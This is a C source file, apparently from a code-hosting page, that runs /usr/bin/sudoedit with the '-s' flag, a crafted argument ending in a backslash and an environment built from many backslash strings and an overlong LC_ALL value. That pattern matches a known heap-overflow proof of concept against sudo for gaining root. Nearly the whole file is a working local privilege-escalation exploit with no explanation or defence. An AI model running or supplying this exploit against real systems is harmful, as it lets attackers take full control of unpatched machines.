80 lines
2.6 KiB
C
80 lines
2.6 KiB
C
/*
|
|
BSD 2-Clause License
|
|
|
|
Copyright (c) 2021, rajvardhan agarwal
|
|
All rights reserved.
|
|
|
|
Redistribution and use in source and binary forms, with or without
|
|
modification, are permitted provided that the following conditions are met:
|
|
|
|
1. Redistributions of source code must retain the above copyright notice, this
|
|
list of conditions and the following disclaimer.
|
|
|
|
2. Redistributions in binary form must reproduce the above copyright notice,
|
|
this list of conditions and the following disclaimer in the documentation
|
|
and/or other materials provided with the distribution.
|
|
|
|
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
|
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
|
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
|
|
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
|
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
|
|
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
|
|
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
|
|
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
#include <stdint.h>
|
|
#include <sys/stat.h>
|
|
#include <stdlib.h>
|
|
|
|
char * str_repeat(char a, size_t n) {
|
|
char * s = malloc(n+1);
|
|
for(int i=0;i<n;++i)
|
|
s[i] = a;
|
|
s[n] = 0;
|
|
return s;
|
|
}
|
|
|
|
char * concat(const char * a, const char * b) {
|
|
size_t len_a = strlen(a);
|
|
size_t len_b = strlen(b);
|
|
size_t size = len_a + len_b;
|
|
|
|
char * s = malloc(size+1);
|
|
int i;
|
|
|
|
for(i=0;i<len_a;++i) s[i] = a[i];
|
|
for(i=0;i<len_b;++i) s[len_a+i] = b[i];
|
|
s[size] = 0;
|
|
return s;
|
|
}
|
|
|
|
int main() {
|
|
char *env[] = {
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"\\", "\\", "\\", "\\", "\\", "\\", "\\",
|
|
"X/X",
|
|
concat("LC_ALL=C.UTF-8@", str_repeat('A', 0xd0)),
|
|
NULL
|
|
};
|
|
|
|
char * a = concat(str_repeat('A', 0x70),"\\");
|
|
char * argv[] = {"/usr/bin/sudoedit", "-s", a, NULL};
|
|
execve(argv[0], argv, env);
|
|
|
|
puts("Execve failed");
|
|
exit(1);
|
|
}
|